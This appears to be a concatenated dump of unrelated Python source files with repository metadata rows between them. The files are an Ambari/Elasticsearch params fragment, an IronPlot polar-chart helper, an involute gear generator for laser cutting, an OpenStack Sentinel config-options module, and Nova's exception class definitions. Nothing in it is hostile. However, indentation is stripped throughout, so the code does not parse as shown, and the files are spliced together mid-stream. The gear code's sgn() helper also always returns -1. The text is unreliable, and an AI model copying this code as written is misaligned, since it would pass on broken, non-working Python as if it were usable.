if 'hcat_log_dir' in config['configurations']['hive-env']:
webhcat_log_dir = config['configurations']['hive-env']['hcat_log_dir']
rm_host = ""
if 'clusterHostInfo' in config and 'rm_host' in config['clusterHostInfo']:
rm_hosts = config['clusterHostInfo']['rm_host']
rm_host = rm_hosts[0]
else:
rm_hosts = default("/clusterHostInfo/rm_host", None)
if type(rm_hosts) is list:
rm_host = rm_hosts[0]
else:
rm_host = rm_hosts
rm_port = 8088
if 'yarn-site' in config['configurations'] and 'yarn.resourcemanager.webapp.address' in config['configurations']['yarn-site'] and ':' in config['configurations']['yarn-site']['yarn.resourcemanager.webapp.address']:
rm_port = config['configurations']['yarn-site']['yarn.resourcemanager.webapp.address'].split(':')[-1]
hostname = config['hostname']
java64_home = config['hostLevelParams']['java_home']
elastic_cluster_name = config['configurations']['elasticsearch-site']['cluster.name']
elastic_port = config['configurations']['elasticsearch-site']['http.port']
kibana_port = config['configurations']['kibana-site']['server.port']
kinana_index = config['configurations']['kibana-site']['kibana.index']
if (('logstash-data-source' in config['configurations']) and ('content' in config['configurations']['logstash-data-source'])):
logstash_conf = config['configurations']['logstash-data-source']['content']
else:
logstash_conf = None
elastic_data_hosts = []
if 'clusterHostInfo' in config and 'elastic_datanode_hosts' in config['clusterHostInfo']:
elastic_data_hosts = config['clusterHostInfo']['elastic_datanode_hosts']
es_host = elastic_data_hosts[0]
else:
elastic_data_hosts = default("/clusterHostInfo/elastic_datanode_hosts", None)
if type(elastic_data_hosts) is list:
es_host = elastic_data_hosts[0]
else:
es_host = elastic_data_hosts
if 'clusterHostInfo' in config and 'kibana_server_hosts' in config['clusterHostInfo']:
kibana_server_hosts = config['clusterHostInfo']['kibana_server_hosts']
kibana_host = kibana_server_hosts[0]
else:
kibana_server_hosts = default("/clusterHostInfo/kibana_server_hosts", None)
if type(kibana_server_hosts) is list:
kibana_host = kibana_server_hosts[0]
else:
kibana_host = kibana_server_hosts | apache-2.0 | -8,679,180,408,679,117,000 | 43.163121 | 214 | 0.716511 | false |
rwg0/ironlab | ILabPythonLib/ironplot/ironplot_mscharts.py | 1 | 1682 | from ironplot_windows import *
import clr
import System
import System.Windows.Controls
from System.Windows.Controls import *
clr.AddReferenceByPartialName("System.Windows.Forms.DataVisualization")
clr.AddReferenceByPartialName("System.Drawing")
clr.AddReferenceToFile("IronPlot.dll")
import System.Windows.Forms.DataVisualization as dv
import System.Drawing as dr
import System
import numpy as np
from System.Windows import Thickness, Visibility
from IronPlot import *
from IronPlot.Plotting3D import Plot3D
floatarray = System.Array[float]
numpyAvailable = True
try:
import numpy as np
except ImportError:
numpyAvailable = False
def radial(theta, r, **kwargs):
""" Create a radial plot (or overwite current plot if hold is set)
"""
if len(theta) != len(r):
raise ValueError('Arrays must be of the same length.')
if PlotContext.CurrentWindowIndex == None:
PlotContext.OpenNextWindow()
if (PlotContext.CurrentPlot == None) or (PlotContext.HoldState == False):
# New plot or overwite plot
host = MSChartHost()
chart = host.Chart
chartArea = dv.Charting.ChartArea(Name = "Default")
chart.ChartAreas.Add(chartArea)
PlotContext.AddPlot(host)
else:
# Add to current plot
chart = PlotContext.CurrentPlot.Chart
seriesName = "Series" + str(chart.Series.Count)
series = dv.Charting.Series(ChartType = dv.Charting.SeriesChartType.Polar, Name = seriesName)
chart.Series.Add(series)
for a, b in zip(theta, r):
chart.Series[seriesName].Points.AddXY(float(a), float(b))
# Apply kwargs
setprops(series, **kwargs)
return series | lgpl-3.0 | -5,491,246,122,984,367,000 | 31.68 | 96 | 0.708086 | false |
DaveBerkeley/lasercut | laser/gears.py | 1 | 3508 | #!/usr/bin/python
import sys
import math
from laser import Polygon, Circle, Collection, Config
from laser import radians, rotate_2d
from render import DXF as dxf
# Involute gears, see :
# http://www.cartertools.com/involute.html
#
#
def circle_intersect(v, r):
# see http://mathworld.wolfram.com/Circle-LineIntersection.html
x1, y1 = v.points[-2]
x2, y2 = v.points[-1]
dx = x1 - x2
dy = y1 - y2
dr = math.sqrt((dx * dx) + (dy * dy))
D = (x1 * y2) - (x2 * y1)
def sgn(a):
return -1
x = -((D * dy) - (sgn(dy)*dx*math.sqrt(((r*r)*(dr*dr))-(D*D)))) / (dr*dr)
y = -((-D*dx) - (abs(dy)* math.sqrt(((r*r)*(dr*dr))-(D*D)))) / (dr*dr)
# truncate the last line segment to fit the radius
v.points[-1] = x, y
#
#
def make_involute(pitch_dia, N, PA=20.0, teeth=None):
m = float(pitch_dia) / N
P = 1.0 / m
D = N / P # Pitch Diameter
R = D / 2.0 # Pitch Radius
DB = D * math.cos(radians(PA)) # Base Circle Diameter
RB = DB / 2.0 # Base Circle Radius
a = 1.0 / P # Addendum
d = 1.157 / P # Dedendum
DO = D + (2 * a) # Outside Diameter
RO = DO / 2.0 # Outside Radius
DR = D - (2 * d) # Root Diameter
RR = DR / 2.0 # Root Radius
CB = math.pi * DB # Circumference of Base Circle
fcb = RB / 20.0
ncb = CB / fcb
acb = 360 / ncb
gt = 360.0 / N # Gear Tooth Spacing
info = {
"outside_dia" : DO,
"pitch_dia" : D,
"root_dia" : DR,
}
v = Polygon()
v.add(0, RR)
# generate involute curve points where
# radius is with the D and DO circles
first = None
for i in range(20):
x, y = i * RB / 20.0, RB
x, y = rotate_2d(radians(i * acb), x, y)
r = abs(complex(x, y))
if r < R:
first = x, y
continue
if first:
v.add(*first)
first = None
v.add(x, y)
if r > RO:
break
# need to trim last involute line segment
# so it doesn't exceed the outside_radius
circle_intersect(v, RO)
# rotate back 1/4 tooth
v.rotate(-gt / 4.0)
# add reflection to itself
w = v.copy()
w.reflect_v()
# make sure the halves are joined correctly
w.points.reverse()
v.add_poly(w)
work = Polygon()
work.info = info
# add all the teeth to the work
for i in range(teeth or N):
c = v.copy()
c.rotate(gt * i)
work.add_poly(c)
# join the ends together
if teeth is None:
work.close()
return work
#
#
if __name__ == "__main__":
x_margin = 10
y_margin = 20
draw = False
if len(sys.argv) > 1:
draw = True
def commit(work):
#work.translate(x_margin, y_margin)
work.draw(drawing, config.cut())
config = Config()
drawing = dxf.drawing("test.dxf")
N = 20
PA = 20.0
pitch_dia = 20
nteeth = None # 6 # set if only some teeth required
work = make_involute(pitch_dia, N, PA, teeth=nteeth)
if nteeth:
work.add(0, 0)
work.close()
if draw:
for label in [ "outside_dia", "root_dia", "pitch_dia" ]:
d = work.info[label]
c = Circle((0, 0), d / 2.0, colour=Config.draw_colour)
work.add(c)
commit(work)
drawing.save()
# FIN
| gpl-2.0 | -6,214,801,681,637,845,000 | 22.702703 | 77 | 0.498575 | false |
spjmurray/openstack-sentinel | sentinel/conf/opts.py | 1 | 1449 | # Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import importlib
from oslo_config import cfg
MODULES = [
'sentinel.clients',
'sentinel.log',
'sentinel.tests.functional.base',
'sentinel.whitelist',
]
def list_opts():
opts = []
for module_name in MODULES:
module = importlib.import_module(module_name)
group = None
if module.OPTS_GROUP:
group = module.OPTS_GROUP.name
opts.append((group, module.OPTS))
return opts
def configure():
conf = cfg.ConfigOpts()
for module_name in MODULES:
module = importlib.import_module(module_name)
group = None
if module.OPTS_GROUP:
group = module.OPTS_GROUP.name
conf.register_group(module.OPTS_GROUP)
conf.register_opts(module.OPTS, group=group)
conf([], project='sentinel')
return conf
# vi: ts=4 et:
| apache-2.0 | 1,883,553,916,626,965,200 | 25.345455 | 78 | 0.661836 | false |
zestrada/nova-cs498cc | nova/exception.py | 1 | 34128 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Nova base exception handling.
Includes decorator for re-raising Nova-type exceptions.
SHOULD include dedicated exception logging.
"""
import functools
from oslo.config import cfg
import webob.exc
from nova.openstack.common import excutils
from nova.openstack.common import log as logging
from nova import safe_utils
LOG = logging.getLogger(__name__)
exc_log_opts = [
cfg.BoolOpt('fatal_exception_format_errors',
default=False,
help='make exception message format errors fatal'),
]
CONF = cfg.CONF
CONF.register_opts(exc_log_opts)
class ConvertedException(webob.exc.WSGIHTTPException):
def __init__(self, code=0, title="", explanation=""):
self.code = code
self.title = title
self.explanation = explanation
super(ConvertedException, self).__init__()
class ProcessExecutionError(IOError):
def __init__(self, stdout=None, stderr=None, exit_code=None, cmd=None,
description=None):
self.exit_code = exit_code
self.stderr = stderr
self.stdout = stdout
self.cmd = cmd
self.description = description
if description is None:
description = _('Unexpected error while running command.')
if exit_code is None:
exit_code = '-'
message = _('%(description)s\nCommand: %(cmd)s\n'
'Exit code: %(exit_code)s\nStdout: %(stdout)r\n'
'Stderr: %(stderr)r') % locals()
IOError.__init__(self, message)
def _cleanse_dict(original):
"""Strip all admin_password, new_pass, rescue_pass keys from a dict."""
return dict((k, v) for k, v in original.iteritems() if not "_pass" in k)
def wrap_exception(notifier=None, publisher_id=None, event_type=None,
level=None):
"""This decorator wraps a method to catch any exceptions that may
get thrown. It logs the exception as well as optionally sending
it to the notification system.
"""
# TODO(sandy): Find a way to import nova.notifier.api so we don't have
# to pass it in as a parameter. Otherwise we get a cyclic import of
# nova.notifier.api -> nova.utils -> nova.exception :(
def inner(f):
def wrapped(self, context, *args, **kw):
# Don't store self or context in the payload, it now seems to
# contain confidential information.
try:
return f(self, context, *args, **kw)
except Exception, e:
with excutils.save_and_reraise_exception():
if notifier:
payload = dict(exception=e)
call_dict = safe_utils.getcallargs(f, *args, **kw)
cleansed = _cleanse_dict(call_dict)
payload.update({'args': cleansed})
# Use a temp vars so we don't shadow
# our outer definitions.
temp_level = level
if not temp_level:
temp_level = notifier.ERROR
temp_type = event_type
if not temp_type:
# If f has multiple decorators, they must use
# functools.wraps to ensure the name is
# propagated.
temp_type = f.__name__
notifier.notify(context, publisher_id, temp_type,
temp_level, payload)
return functools.wraps(f)(wrapped)
return inner
class NovaException(Exception):
"""Base Nova Exception
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
code = 500
headers = {}
safe = False
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if 'code' not in self.kwargs:
try:
self.kwargs['code'] = self.code
except AttributeError:
pass
if not message:
try:
message = self.message % kwargs
except Exception as e:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_('Exception in string format operation'))
for name, value in kwargs.iteritems():
LOG.error("%s: %s" % (name, value))
if CONF.fatal_exception_format_errors:
raise e
else:
# at least get the core message out if something happened
message = self.message
super(NovaException, self).__init__(message)
def format_message(self):
if self.__class__.__name__.endswith('_Remote'):
return self.args[0]
else:
return unicode(self)
class EC2APIError(NovaException):
message = _("Unknown")
def __init__(self, message=None, code=None):
self.msg = message
self.code = code
outstr = '%s' % message
super(EC2APIError, self).__init__(outstr)
class EncryptionFailure(NovaException):
message = _("Failed to encrypt text: %(reason)s")
class DecryptionFailure(NovaException):
message = _("Failed to decrypt text: %(reason)s")
class VirtualInterfaceCreateException(NovaException):
message = _("Virtual Interface creation failed")
class VirtualInterfaceMacAddressException(NovaException):
message = _("5 attempts to create virtual interface"
"with unique mac address failed")
class GlanceConnectionFailed(NovaException):
message = _("Connection to glance host %(host)s:%(port)s failed: "
"%(reason)s")
class NotAuthorized(NovaException):
message = _("Not authorized.")
code = 403
class AdminRequired(NotAuthorized):
message = _("User does not have admin privileges")
class PolicyNotAuthorized(NotAuthorized):
message = _("Policy doesn't allow %(action)s to be performed.")
class ImageNotActive(NovaException):
message = _("Image %(image_id)s is not active.")
class ImageNotAuthorized(NovaException):
message = _("Not authorized for image %(image_id)s.")
class Invalid(NovaException):
message = _("Unacceptable parameters.")
code = 400
class InvalidBDM(Invalid):
message = _("Block Device Mapping is Invalid.")
class InvalidBDMSnapshot(InvalidBDM):
message = _("Block Device Mapping is Invalid: "
"failed to get snapshot %(id)s.")
class InvalidBDMVolume(InvalidBDM):
message = _("Block Device Mapping is Invalid: "
"failed to get volume %(id)s.")
class VolumeUnattached(Invalid):
message = _("Volume %(volume_id)s is not attached to anything")
class VolumeNotCreated(NovaException):
message = _("Volume %(volume_id)s did not finish being created"
" even after we waited %(seconds)s seconds or %(attempts)s"
" attempts.")
class InvalidKeypair(Invalid):
message = _("Keypair data is invalid")
class InvalidRequest(Invalid):
message = _("The request is invalid.")
class InvalidInput(Invalid):
message = _("Invalid input received") + ": %(reason)s"
class InvalidVolume(Invalid):
message = _("Invalid volume") + ": %(reason)s"
class InvalidMetadata(Invalid):
message = _("Invalid metadata") + ": %(reason)s"
class InvalidMetadataSize(Invalid):
message = _("Invalid metadata size") + ": %(reason)s"
class InvalidPortRange(Invalid):
message = _("Invalid port range %(from_port)s:%(to_port)s. %(msg)s")
class InvalidIpProtocol(Invalid):
message = _("Invalid IP protocol %(protocol)s.")
class InvalidContentType(Invalid):
message = _("Invalid content type %(content_type)s.")
class InvalidCidr(Invalid):
message = _("Invalid cidr %(cidr)s.")
class InvalidUnicodeParameter(Invalid):
message = _("Invalid Parameter: "
"Unicode is not supported by the current database.")
# Cannot be templated as the error syntax varies.
# msg needs to be constructed when raised.
class InvalidParameterValue(Invalid):
message = _("%(err)s")
class InvalidAggregateAction(Invalid):
message = _("Cannot perform action '%(action)s' on aggregate "
"%(aggregate_id)s. Reason: %(reason)s.")
class InvalidGroup(Invalid):
message = _("Group not valid. Reason: %(reason)s")
class InvalidSortKey(Invalid):
message = _("Sort key supplied was not valid.")
class InstanceInvalidState(Invalid):
message = _("Instance %(instance_uuid)s in %(attr)s %(state)s. Cannot "
"%(method)s while the instance is in this state.")
class InstanceNotRunning(Invalid):
message = _("Instance %(instance_id)s is not running.")
class InstanceNotInRescueMode(Invalid):
message = _("Instance %(instance_id)s is not in rescue mode")
class InstanceNotRescuable(Invalid):
message = _("Instance %(instance_id)s cannot be rescued: %(reason)s")
class InstanceNotReady(Invalid):
message = _("Instance %(instance_id)s is not ready")
class InstanceSuspendFailure(Invalid):
message = _("Failed to suspend instance") + ": %(reason)s"
class InstanceResumeFailure(Invalid):
message = _("Failed to resume instance: %(reason)s.")
class InstancePowerOnFailure(Invalid):
message = _("Failed to power on instance: %(reason)s.")
class InstancePowerOffFailure(Invalid):
message = _("Failed to power off instance: %(reason)s.")
class InstanceRebootFailure(Invalid):
message = _("Failed to reboot instance") + ": %(reason)s"
class InstanceTerminationFailure(Invalid):
message = _("Failed to terminate instance") + ": %(reason)s"
class InstanceDeployFailure(Invalid):
message = _("Failed to deploy instance") + ": %(reason)s"
class ServiceUnavailable(Invalid):
message = _("Service is unavailable at this time.")
class ComputeResourcesUnavailable(ServiceUnavailable):
message = _("Insufficient compute resources.")
class ComputeServiceUnavailable(ServiceUnavailable):
message = _("Compute service of %(host)s is unavailable at this time.")
class UnableToMigrateToSelf(Invalid):
message = _("Unable to migrate instance (%(instance_id)s) "
"to current host (%(host)s).")
class InvalidHypervisorType(Invalid):
message = _("The supplied hypervisor type of is invalid.")
class DestinationHypervisorTooOld(Invalid):
message = _("The instance requires a newer hypervisor version than "
"has been provided.")
class DestinationDiskExists(Invalid):
message = _("The supplied disk path (%(path)s) already exists, "
"it is expected not to exist.")
class InvalidDevicePath(Invalid):
message = _("The supplied device path (%(path)s) is invalid.")
class DevicePathInUse(Invalid):
message = _("The supplied device path (%(path)s) is in use.")
code = 409
class DeviceIsBusy(Invalid):
message = _("The supplied device (%(device)s) is busy.")
class InvalidCPUInfo(Invalid):
message = _("Unacceptable CPU info") + ": %(reason)s"
class InvalidIpAddressError(Invalid):
message = _("%(address)s is not a valid IP v4/6 address.")
class InvalidVLANTag(Invalid):
message = _("VLAN tag is not appropriate for the port group "
"%(bridge)s. Expected VLAN tag is %(tag)s, "
"but the one associated with the port group is %(pgroup)s.")
class InvalidVLANPortGroup(Invalid):
message = _("vSwitch which contains the port group %(bridge)s is "
"not associated with the desired physical adapter. "
"Expected vSwitch is %(expected)s, but the one associated "
"is %(actual)s.")
class InvalidDiskFormat(Invalid):
message = _("Disk format %(disk_format)s is not acceptable")
class ImageUnacceptable(Invalid):
message = _("Image %(image_id)s is unacceptable: %(reason)s")
class InstanceUnacceptable(Invalid):
message = _("Instance %(instance_id)s is unacceptable: %(reason)s")
class InvalidEc2Id(Invalid):
message = _("Ec2 id %(ec2_id)s is unacceptable.")
class InvalidUUID(Invalid):
message = _("Expected a uuid but received %(uuid)s.")
class InvalidID(Invalid):
message = _("Invalid ID received %(id)s.")
class InvalidPeriodicTaskArg(Invalid):
message = _("Unexpected argument for periodic task creation: %(arg)s.")
class ConstraintNotMet(NovaException):
message = _("Constraint not met.")
code = 412
class NotFound(NovaException):
message = _("Resource could not be found.")
code = 404
class AgentBuildNotFound(NotFound):
message = _("No agent-build associated with id %(id)s.")
class VolumeNotFound(NotFound):
message = _("Volume %(volume_id)s could not be found.")
class SnapshotNotFound(NotFound):
message = _("Snapshot %(snapshot_id)s could not be found.")
class ISCSITargetNotFoundForVolume(NotFound):
message = _("No target id found for volume %(volume_id)s.")
class DiskNotFound(NotFound):
message = _("No disk at %(location)s")
class VolumeDriverNotFound(NotFound):
message = _("Could not find a handler for %(driver_type)s volume.")
class InvalidImageRef(Invalid):
message = _("Invalid image href %(image_href)s.")
class ImageNotFound(NotFound):
message = _("Image %(image_id)s could not be found.")
class ImageNotFoundEC2(ImageNotFound):
message = _("Image %(image_id)s could not be found. The nova EC2 API "
"assigns image ids dynamically when they are listed for the "
"first time. Have you listed image ids since adding this "
"image?")
class ProjectNotFound(NotFound):
message = _("Project %(project_id)s could not be found.")
class StorageRepositoryNotFound(NotFound):
message = _("Cannot find SR to read/write VDI.")
class NetworkDuplicated(NovaException):
message = _("Network %(network_id)s is duplicated.")
class NetworkInUse(NovaException):
message = _("Network %(network_id)s is still in use.")
class NetworkNotCreated(NovaException):
message = _("%(req)s is required to create a network.")
class NetworkNotFound(NotFound):
message = _("Network %(network_id)s could not be found.")
class PortNotFound(NotFound):
message = _("Port id %(port_id)s could not be found.")
class NetworkNotFoundForBridge(NetworkNotFound):
message = _("Network could not be found for bridge %(bridge)s")
class NetworkNotFoundForUUID(NetworkNotFound):
message = _("Network could not be found for uuid %(uuid)s")
class NetworkNotFoundForCidr(NetworkNotFound):
message = _("Network could not be found with cidr %(cidr)s.")
class NetworkNotFoundForInstance(NetworkNotFound):
message = _("Network could not be found for instance %(instance_id)s.")
class NoNetworksFound(NotFound):
message = _("No networks defined.")
class NetworkNotFoundForProject(NotFound):
message = _("Either Network uuid %(network_uuid)s is not present or "
"is not assigned to the project %(project_id)s.")
class DatastoreNotFound(NotFound):
message = _("Could not find the datastore reference(s) which the VM uses.")
class PortInUse(NovaException):
message = _("Port %(port_id)s is still in use.")
class PortNotUsable(NovaException):
message = _("Port %(port_id)s not usable for instance %(instance)s.")
class PortNotFree(NovaException):
message = _("No free port available for instance %(instance)s.")
class FixedIpNotFound(NotFound):
message = _("No fixed IP associated with id %(id)s.")
class FixedIpNotFoundForAddress(FixedIpNotFound):
message = _("Fixed ip not found for address %(address)s.")
class FixedIpNotFoundForInstance(FixedIpNotFound):
message = _("Instance %(instance_uuid)s has zero fixed ips.")
class FixedIpNotFoundForNetworkHost(FixedIpNotFound):
message = _("Network host %(host)s has zero fixed ips "
"in network %(network_id)s.")
class FixedIpNotFoundForSpecificInstance(FixedIpNotFound):
message = _("Instance %(instance_uuid)s doesn't have fixed ip '%(ip)s'.")
class FixedIpNotFoundForNetwork(FixedIpNotFound):
message = _("Fixed IP address (%(address)s) does not exist in "
"network (%(network_uuid)s).")
class FixedIpAlreadyInUse(NovaException):
message = _("Fixed IP address %(address)s is already in use on instance "
"%(instance_uuid)s.")
class FixedIpAssociatedWithMultipleInstances(NovaException):
message = _("More than one instance is associated with fixed ip address "
"'%(address)s'.")
class FixedIpInvalid(Invalid):
message = _("Fixed IP address %(address)s is invalid.")
class NoMoreFixedIps(NovaException):
message = _("Zero fixed ips available.")
class NoFixedIpsDefined(NotFound):
message = _("Zero fixed ips could be found.")
#TODO(bcwaldon): EOL this exception!
class Duplicate(NovaException):
pass
class FloatingIpExists(Duplicate):
message = _("Floating ip %(address)s already exists.")
class FloatingIpNotFound(NotFound):
message = _("Floating ip not found for id %(id)s.")
class FloatingIpDNSExists(Invalid):
message = _("The DNS entry %(name)s already exists in domain %(domain)s.")
class FloatingIpNotFoundForAddress(FloatingIpNotFound):
message = _("Floating ip not found for address %(address)s.")
class FloatingIpNotFoundForHost(FloatingIpNotFound):
message = _("Floating ip not found for host %(host)s.")
class FloatingIpMultipleFoundForAddress(NovaException):
message = _("Multiple floating ips are found for address %(address)s.")
class FloatingIpPoolNotFound(NotFound):
message = _("Floating ip pool not found.")
safe = True
class NoMoreFloatingIps(FloatingIpNotFound):
message = _("Zero floating ips available.")
safe = True
class FloatingIpAssociated(NovaException):
message = _("Floating ip %(address)s is associated.")
class FloatingIpNotAssociated(NovaException):
message = _("Floating ip %(address)s is not associated.")
class NoFloatingIpsDefined(NotFound):
message = _("Zero floating ips exist.")
class NoFloatingIpInterface(NotFound):
message = _("Interface %(interface)s not found.")
class CannotDisassociateAutoAssignedFloatingIP(NovaException):
message = _("Cannot disassociate auto assigined floating ip")
class KeypairNotFound(NotFound):
message = _("Keypair %(name)s not found for user %(user_id)s")
class CertificateNotFound(NotFound):
message = _("Certificate %(certificate_id)s not found.")
class ServiceNotFound(NotFound):
message = _("Service %(service_id)s could not be found.")
class HostNotFound(NotFound):
message = _("Host %(host)s could not be found.")
class ComputeHostNotFound(HostNotFound):
message = _("Compute host %(host)s could not be found.")
class HostBinaryNotFound(NotFound):
message = _("Could not find binary %(binary)s on host %(host)s.")
class InvalidReservationExpiration(Invalid):
message = _("Invalid reservation expiration %(expire)s.")
class InvalidQuotaValue(Invalid):
message = _("Change would make usage less than 0 for the following "
"resources: %(unders)s")
class QuotaNotFound(NotFound):
message = _("Quota could not be found")
class QuotaResourceUnknown(QuotaNotFound):
message = _("Unknown quota resources %(unknown)s.")
class ProjectQuotaNotFound(QuotaNotFound):
message = _("Quota for project %(project_id)s could not be found.")
class QuotaClassNotFound(QuotaNotFound):
message = _("Quota class %(class_name)s could not be found.")
class QuotaUsageNotFound(QuotaNotFound):
message = _("Quota usage for project %(project_id)s could not be found.")
class ReservationNotFound(QuotaNotFound):
message = _("Quota reservation %(uuid)s could not be found.")
class OverQuota(NovaException):
message = _("Quota exceeded for resources: %(overs)s")
class SecurityGroupNotFound(NotFound):
message = _("Security group %(security_group_id)s not found.")
class SecurityGroupNotFoundForProject(SecurityGroupNotFound):
message = _("Security group %(security_group_id)s not found "
"for project %(project_id)s.")
class SecurityGroupNotFoundForRule(SecurityGroupNotFound):
message = _("Security group with rule %(rule_id)s not found.")
class SecurityGroupExistsForInstance(Invalid):
message = _("Security group %(security_group_id)s is already associated"
" with the instance %(instance_id)s")
class SecurityGroupNotExistsForInstance(Invalid):
message = _("Security group %(security_group_id)s is not associated with"
" the instance %(instance_id)s")
class SecurityGroupDefaultRuleNotFound(Invalid):
message = _("Security group default rule (%rule_id)s not found.")
class SecurityGroupCannotBeApplied(Invalid):
message = _("Network requires port_security_enabled and subnet associated"
" in order to apply security groups.")
class NoUniqueMatch(NovaException):
message = _("No Unique Match Found.")
code = 409
class MigrationNotFound(NotFound):
message = _("Migration %(migration_id)s could not be found.")
class MigrationNotFoundByStatus(MigrationNotFound):
message = _("Migration not found for instance %(instance_id)s "
"with status %(status)s.")
class ConsolePoolNotFound(NotFound):
message = _("Console pool %(pool_id)s could not be found.")
class ConsolePoolNotFoundForHostType(NotFound):
message = _("Console pool of type %(console_type)s "
"for compute host %(compute_host)s "
"on proxy host %(host)s not found.")
class ConsoleNotFound(NotFound):
message = _("Console %(console_id)s could not be found.")
class ConsoleNotFoundForInstance(ConsoleNotFound):
message = _("Console for instance %(instance_uuid)s could not be found.")
class ConsoleNotFoundInPoolForInstance(ConsoleNotFound):
message = _("Console for instance %(instance_uuid)s "
"in pool %(pool_id)s could not be found.")
class ConsoleTypeInvalid(Invalid):
message = _("Invalid console type %(console_type)s")
class InstanceTypeNotFound(NotFound):
message = _("Instance type %(instance_type_id)s could not be found.")
class InstanceTypeNotFoundByName(InstanceTypeNotFound):
message = _("Instance type with name %(instance_type_name)s "
"could not be found.")
class FlavorNotFound(NotFound):
message = _("Flavor %(flavor_id)s could not be found.")
class FlavorAccessNotFound(NotFound):
message = _("Flavor access not found for %(flavor_id)s / "
"%(project_id)s combination.")
class CellNotFound(NotFound):
message = _("Cell %(cell_name)s doesn't exist.")
class CellRoutingInconsistency(NovaException):
message = _("Inconsistency in cell routing: %(reason)s")
class CellServiceAPIMethodNotFound(NotFound):
message = _("Service API method not found: %(detail)s")
class CellTimeout(NotFound):
message = _("Timeout waiting for response from cell")
class CellMaxHopCountReached(NovaException):
message = _("Cell message has reached maximum hop count: %(hop_count)s")
class NoCellsAvailable(NovaException):
message = _("No cells available matching scheduling criteria.")
class CellError(NovaException):
message = _("Exception received during cell processing: %(exc_name)s.")
class InstanceUnknownCell(NotFound):
message = _("Cell is not known for instance %(instance_uuid)s")
class SchedulerHostFilterNotFound(NotFound):
message = _("Scheduler Host Filter %(filter_name)s could not be found.")
class InstanceMetadataNotFound(NotFound):
message = _("Instance %(instance_uuid)s has no metadata with "
"key %(metadata_key)s.")
class InstanceSystemMetadataNotFound(NotFound):
message = _("Instance %(instance_uuid)s has no system metadata with "
"key %(metadata_key)s.")
class InstanceTypeExtraSpecsNotFound(NotFound):
message = _("Instance Type %(instance_type_id)s has no extra specs with "
"key %(extra_specs_key)s.")
class FileNotFound(NotFound):
message = _("File %(file_path)s could not be found.")
class NoFilesFound(NotFound):
message = _("Zero files could be found.")
class SwitchNotFoundForNetworkAdapter(NotFound):
message = _("Virtual switch associated with the "
"network adapter %(adapter)s not found.")
class NetworkAdapterNotFound(NotFound):
message = _("Network adapter %(adapter)s could not be found.")
class ClassNotFound(NotFound):
message = _("Class %(class_name)s could not be found: %(exception)s")
class NotAllowed(NovaException):
message = _("Action not allowed.")
class ImageRotationNotAllowed(NovaException):
message = _("Rotation is not allowed for snapshots")
class RotationRequiredForBackup(NovaException):
message = _("Rotation param is required for backup image_type")
class KeyPairExists(Duplicate):
message = _("Key pair %(key_name)s already exists.")
class InstanceExists(Duplicate):
message = _("Instance %(name)s already exists.")
class InstanceTypeExists(Duplicate):
message = _("Instance Type with name %(name)s already exists.")
class InstanceTypeIdExists(Duplicate):
message = _("Instance Type with ID %(flavor_id)s already exists.")
class FlavorAccessExists(Duplicate):
message = _("Flavor access alreay exists for flavor %(flavor_id)s "
"and project %(project_id)s combination.")
class InvalidSharedStorage(NovaException):
message = _("%(path)s is not on shared storage: %(reason)s")
class InvalidLocalStorage(NovaException):
message = _("%(path)s is not on local storage: %(reason)s")
class MigrationError(NovaException):
message = _("Migration error") + ": %(reason)s"
class MalformedRequestBody(NovaException):
message = _("Malformed message body: %(reason)s")
# NOTE(johannes): NotFound should only be used when a 404 error is
# appropriate to be returned
class ConfigNotFound(NovaException):
message = _("Could not find config at %(path)s")
class PasteAppNotFound(NovaException):
message = _("Could not load paste app '%(name)s' from %(path)s")
class CannotResizeToSameFlavor(NovaException):
message = _("When resizing, instances must change flavor!")
class ResizeError(NovaException):
message = _("Resize error: %(reason)s")
class ImageTooLarge(NovaException):
message = _("Image is larger than instance type allows")
class InstanceTypeMemoryTooSmall(NovaException):
message = _("Instance type's memory is too small for requested image.")
class InstanceTypeDiskTooSmall(NovaException):
message = _("Instance type's disk is too small for requested image.")
class InsufficientFreeMemory(NovaException):
message = _("Insufficient free memory on compute node to start %(uuid)s.")
class CouldNotFetchMetrics(NovaException):
message = _("Could not fetch bandwidth/cpu/disk metrics for this host.")
class NoValidHost(NovaException):
message = _("No valid host was found. %(reason)s")
class QuotaError(NovaException):
message = _("Quota exceeded") + ": code=%(code)s"
code = 413
headers = {'Retry-After': 0}
safe = True
class TooManyInstances(QuotaError):
message = _("Quota exceeded for %(overs)s: Requested %(req)s,"
" but already used %(used)d of %(allowed)d %(resource)s")
class FloatingIpLimitExceeded(QuotaError):
message = _("Maximum number of floating ips exceeded")
class FixedIpLimitExceeded(QuotaError):
message = _("Maximum number of fixed ips exceeded")
class MetadataLimitExceeded(QuotaError):
message = _("Maximum number of metadata items exceeds %(allowed)d")
class OnsetFileLimitExceeded(QuotaError):
message = _("Personality file limit exceeded")
class OnsetFilePathLimitExceeded(QuotaError):
message = _("Personality file path too long")
class OnsetFileContentLimitExceeded(QuotaError):
message = _("Personality file content too long")
class KeypairLimitExceeded(QuotaError):
message = _("Maximum number of key pairs exceeded")
class SecurityGroupLimitExceeded(QuotaError):
message = _("Maximum number of security groups or rules exceeded")
class AggregateError(NovaException):
message = _("Aggregate %(aggregate_id)s: action '%(action)s' "
"caused an error: %(reason)s.")
class AggregateNotFound(NotFound):
message = _("Aggregate %(aggregate_id)s could not be found.")
class AggregateNameExists(Duplicate):
message = _("Aggregate %(aggregate_name)s already exists.")
